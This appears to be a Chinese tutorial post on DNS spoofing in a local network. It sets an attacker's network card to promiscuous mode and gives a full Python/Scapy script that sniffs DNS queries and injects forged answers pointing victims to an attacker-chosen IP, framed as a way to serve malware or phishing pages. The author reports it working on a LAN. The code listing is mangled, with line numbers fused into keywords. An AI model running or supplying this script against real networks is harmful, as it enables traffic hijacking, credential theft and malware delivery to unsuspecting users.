python实现局域网攻击_通过python实现DNS欺骗

假设在一个的局域网内有两个人：Bob和Eve。Eve想让Bob访问他创建的恶意网页，这样她就可以通过隐藏性的下载给Bob的计算机上安装恶意软件，或者可能展示一个欺骗性的站点来试图窃取Bob的认证信息。

（图片来自以上提供的链接）

（本测试环境，均为centos6.5系统环境）

一、设置attacker服务器的网卡模式为混杂模式，这样就可以捕获局域网内的所有数据包：

ifconfig em1 promisc

查看网卡模式：ifconfig em1

说明网卡已经是混杂模式

二、编写攻击代码：

打开dns_spoof.py脚本文件：

1 #!/usr/bin/env python

2 #-*- coding -*-:utf-8

3

4 from scapy.all import *

5 importtime6 importlogging7

8 logger = logging.getLogger('main')9 logging.basicConfig(format='%(levelname)s:%(message)s',level=logging.DEBUG)10 logger.setLevel(logging.DEBUG)11 #Set the interface for scapy to use

12 conf.iface = 'br0'

13 #Set the spoofed response

14 spoofed_ip = '192.168.28.118'

15

16 defsend_response(x):17 #Get the requested domain

18 req_domain =x[DNS].qd.qname19 logger.info('Found request for' +req_domain)20 #First,we delete the existing lengths and checksums..

21 #We will let Scapy re-create them

22 del(x[UDP].len)23 del(x[UDP].chksum)24 del(x[IP].len)25 del(x[IP].chksum)26 #Let`s build our response from a copy of the original packet

27 response =x.copy()28 #we need to start by changing our response to be "from-ds" ,or from the access point.

29 response.FCfield = 2L

30 #Switch the MAC addresses

31 #response.addr1,response.addr2 = x.addr2,x.addr1

32 response.src,response.dst =x.dst,x.src33 #Switch the IP addresses

34 response[IP].src,response[IP].dst =x[IP].dst,x[IP].src35 #Switch the ports

36 response.sport,response.dport =x.dport,x.sport37 #Set the DNS flags

38 response[DNS].qr = 1L

39 response[DNS].ra = 1L

40 response[DNS].ancount = 1

41 #Let`s add on the answer section

42 response[DNS].an =DNSRR(43 rrname =req_domain,44 type = 'A',45 rclass = 'IN',46 ttl = 900,47 rdata =spoofed_ip48 )49 #Now,we inject the response!

50 sendp(response)51 logger.info('Sent response:' + req_domain + '->' + spoofed_ip + '\n')52

53 defmain():54 logger.info('Starting to intercept [CTRL+C to stop]')55 sniff(prn=lambda x: send_response(x),lfilter=lambda x:x.haslayer(UDP) and x.dport == 53)56

57 if __name__ == "__main__":58 #Make it happen!

59 main()

View Code

该脚本将捕获局域网内的DNS的A记录查询

三、演示：（为了方便演示，将本地dns服务器设置为了223.5.5.5）

使用dig @223.5.5.5 www.baidu.com命令测试如下：

本文借鉴了http://jordan-wright.com/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/的方式，脚本直接使用会有问题，做了一下调整，局域网环境实验成功。

译文连接：http://www.oschina.net/translate/wireless-attacks-with-python-part-one-the-airpwn-attack